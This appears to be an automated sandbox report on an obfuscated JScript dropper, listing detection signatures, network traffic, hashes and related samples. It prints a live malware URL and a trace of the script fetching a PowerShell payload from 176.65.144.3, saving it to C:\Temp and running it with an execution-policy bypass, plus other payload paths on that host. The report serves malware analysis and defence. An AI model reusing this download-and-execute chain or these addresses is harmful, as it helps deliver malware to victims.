Edit tour

Windows Analysis Report
11001011021.js

Overview

General Information

Sample name:11001011021.js
Analysis ID:1647017
MD5:2d974336048d6fbb4a8ab29b288b4252
SHA1:fc3260928b6dca25af9f898dd12abed79c501840
SHA256:8ec2c025e081b4bc40b329d1a280cf86a2124f4d604c8cb97e894b93763d371c
Tags:jsuser-abuse_ch
Infos:

Detection

Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 6900 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6900, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49695
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", ProcessId: 6900, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6900, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49695
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js", ProcessId: 6900, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://176.65.144.3/host/STEPHH.ps1Avira URL Cloud: Label: malware
Source: 11001011021.jsVirustotal: Detection: 14%Perma Link
Source: 11001011021.jsReversingLabs: Detection: 13%

Software Vulnerabilities

barindex
Source: 11001011021.jsReturn value : ['Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsReturn value : ['"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', '"WScript.Shell"', '"Scripting.FileSystemObject"', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: 11001011021.jsReturn value : ['Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsArgument value : ['"http://176.65.144.3/host/STEPHH.ps1","C:\\Temp\\QCCZXZFSSHSHSJ.ps1"']Go to definition
Source: 11001011021.jsReturn value : ['Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Download f', 'Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsReturn value : ['Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsArgument value : ['"GET","http://176.65.144.3/host/STEPHH.ps1",false', '"Send"']Go to definition
Source: 11001011021.jsReturn value : ['Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsReturn value : ['"http://176.65.144.3/host/STEPHH.ps1"', '"MSXML2.XMLHTTP"', '"Send"']Go to definition
Source: 11001011021.jsArgument value : ['"http://176.65.144.3/host/STEPHH.ps1","C:\\Temp\\QCCZXZFSSHSHSJ.ps1"']Go to definition
Source: 11001011021.jsReturn value : ['Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\\Temp,101766JtIuDf,Down']Go to definition
Source: 11001011021.jsReturn value : ['"http://176.65.144.3/host/STEPHH.ps1"', '"MSXML2.XMLHTTP"']Go to definition
Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
Source: global trafficTCP traffic: 192.168.2.6:49695 -> 176.65.144.3:80
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: wscript.exe, 00000000.00000003.1262614334.000001BC435A5000.00000004.00000020.00020000.00000000.sdmp, 11001011021.jsString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1
Source: wscript.exe, 00000000.00000003.1554555141.000001BC418DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1554422587.000001BC418D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1557985499.000001BC418DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps14
Source: wscript.exe, 00000000.00000003.1555890715.000001BC43855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/STEPHH.ps1z
Source: wscript.exe, 00000000.00000002.1559342527.000001BC43DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: 11001011021.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal92.evad.winJS@1/0@0/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 11001011021.jsVirustotal: Detection: 14%
Source: 11001011021.jsReversingLabs: Detection: 13%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:192 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:207 f:i a0:388");ITextStream.WriteLine(" exit:207 f:i r:%22CreateObject%22");ITextStream.WriteLine(" entry:212 f:i a0:383");ITextStream.WriteLine(" exit:212 f:i r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:203 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:203 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:223 f:i a0:394");ITextStream.WriteLine(" exit:223 f:i r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:217 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:217 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:277 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:277 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:288 f:i a0:407");ITextStream.WriteLine(" exit:288 f:i r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:284 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:284 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:523 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fhost%2FSTEPHH.ps1%22 a1:%22C%3A%5CTemp%5CQCCZXZFSSHSHSJ.ps1%22");ITextStream.WriteLine(" exec:330 f:DownloadScript");ITextStream.WriteLine(" entry:346 f:j a0:400");ITextStream.WriteLine(" exit:346 f:j r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:340 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fhost%2FSTEPHH.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/host/STEPHH.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:340 o: f:Open r:undefined");ITextStream.WriteLine(" entry:357 f:j a0:408");ITextStream.WriteLine(" exit:357 f:j r:%22Send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:353 o: f:Send");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.1558006642.000001BC418E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1559342527.000001BC43DF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1555037132.000001BC418E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1554387899.000001BC418E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1558006642.000001BC418E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1555037132.000001BC418E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1554387899.000001BC418E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`G
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: wscript.exe, 00000000.00000002.1559342527.000001BC43E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmandJ
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid AccountsWindows Management Instrumentation32
Scripting
11
Process Injection
11
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1647017 Sample: 11001011021.js Startdate: 24/03/2025 Architecture: WINDOWS Score: 92 11 Antivirus detection for URL or domain 2->11 13 Multi AV Scanner detection for submitted file 2->13 15 JavaScript source code contains functionality to generate code involving HTTP requests or file downloads 2->15 17 3 other signatures 2->17 5 wscript.exe 1 13 2->5         started        process3 dnsIp4 9 176.65.144.3, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 5->9 19 System process connects to network (likely due to code injection or exploit) 5->19 21 JScript performs obfuscated calls to suspicious functions 5->21 23 Windows Scripting host queries suspicious COM object (likely to drop second stage) 5->23 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
11001011021.js15%VirustotalBrowse
11001011021.js14%ReversingLabsWin32.Dropper.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://176.65.144.3/host/STEPHH.ps1100%Avira URL Cloudmalware
http://176.65.144.3/host/STEPHH.ps1z0%Avira URL Cloudsafe
http://176.65.144.3/host/STEPHH.ps140%Avira URL Cloudsafe

Download Network PCAP: filteredfull

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://176.65.144.3/host/STEPHH.ps1wscript.exe, 00000000.00000003.1262614334.000001BC435A5000.00000004.00000020.00020000.00000000.sdmp, 11001011021.jstrue
  • Avira URL Cloud: malware
unknown
http://176.65.144.3/host/STEPHH.ps1zwscript.exe, 00000000.00000003.1555890715.000001BC43855000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/STEPHH.ps14wscript.exe, 00000000.00000003.1554555141.000001BC418DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1554422587.000001BC418D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1557985499.000001BC418DC000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
176.65.144.3
unknownGermany
12975PALTEL-ASPALTELAutonomousSystemPStrue
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1647017
Start date and time:2025-03-24 14:02:36 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:11001011021.js
Detection:MAL
Classification:mal92.evad.winJS@1/0@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 184.31.69.3, 52.149.20.212
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
176.65.144.3#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/host/kent.exe
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.3/dev/xenbuild.exe
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/FILE/KENNNTTT.ps1
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3/FILE/STEPH.ps1
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3/dev/fireballs.exe
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/muhk.exe
obfuscated (1).jsGet hashmaliciousXWormBrowse
  • 176.65.144.3/dev/BRAINN.exe
KIM.ps1Get hashmaliciousStealeriumBrowse
  • 176.65.144.3/dev/Cooperbuild34.exe
KENT.ps1Get hashmaliciousRemcosBrowse
  • 176.65.144.3/dev/kent.exe
VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/DONORIGIN.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
PALTEL-ASPALTELAutonomousSystemPSpayment-pdf.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
DHL AWB.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
DHL AWB.jsGet hashmaliciousUnknownBrowse
  • 176.65.144.3
#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
owari.spc.elfGet hashmaliciousUnknownBrowse
  • 213.6.206.42
SecuriteInfo.com.Win32.Trojan.Agent.QWCKHW.31433.26307.exeGet hashmaliciousUnknownBrowse
  • 176.65.138.157
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.135
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3
nabppc.elfGet hashmaliciousUnknownBrowse
  • 82.213.50.193
No context
No context
No created / dropped files found
File type:ASCII text, with very long lines (2069), with no line terminators
Entropy (8bit):5.72103319850097
TrID:
  • Java Script (8504/1) 100.00%
File name:11001011021.js
File size:2'069 bytes
MD5:2d974336048d6fbb4a8ab29b288b4252
SHA1:fc3260928b6dca25af9f898dd12abed79c501840
SHA256:8ec2c025e081b4bc40b329d1a280cf86a2124f4d604c8cb97e894b93763d371c
SHA512:bc1c79ae4b586c8b6966aaa6ef31d8b1ff785917f8a74e8ef0a9661f9cdc28b3ec3ae244ed10b785ea2ae9e4a016034b9b1b35f62921e7763fa08ad1df3bc2c1
SSDEEP:48:1iXkepGw32/rcmxbCv9a8J6lt/axm0OUCTtWJDaNcBF:xw3krJCv9Kt/IWtER
TLSH:1B4143EE3F00E15CCB47472F8C2F8529E661FA45AD15C521E3A1AAC47C14360FD2A7AA
File Content Preview:var i=b;(function(c,d){var h=b,e=c();while(!![]){try{var f=-parseInt(h(0x18e))/0x1+parseInt(h(0x191))/0x2+-parseInt(h(0x193))/0x3*(parseInt(h(0x188))/0x4)+-parseInt(h(0x18b))/0x5+parseInt(h(0x186))/0x6*(parseInt(h(0x192))/0x7)+parseInt(h(0x189))/0x8+-pars
Icon Hash:68d69b8bb6aa9a86

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Mar 24, 2025 14:03:37.893151045 CET4969580192.168.2.6176.65.144.3
Mar 24, 2025 14:03:38.890459061 CET4969580192.168.2.6176.65.144.3
Mar 24, 2025 14:03:40.905937910 CET4969580192.168.2.6176.65.144.3
Mar 24, 2025 14:03:44.921746969 CET4969580192.168.2.6176.65.144.3
Mar 24, 2025 14:03:52.921782017 CET4969580192.168.2.6176.65.144.3
050100s020406080100

Click to jump to process

050100s0.005101520MB

Click to jump to process

  • File
  • Registry

Click to dive into process behavior distribution

Target ID:0
Start time:09:03:34
Start date:24/03/2025
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001011021.js"
Imagebase:0x7ff7683f0000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Call Graph

Hide Legend
  • Executed
  • Not Executed
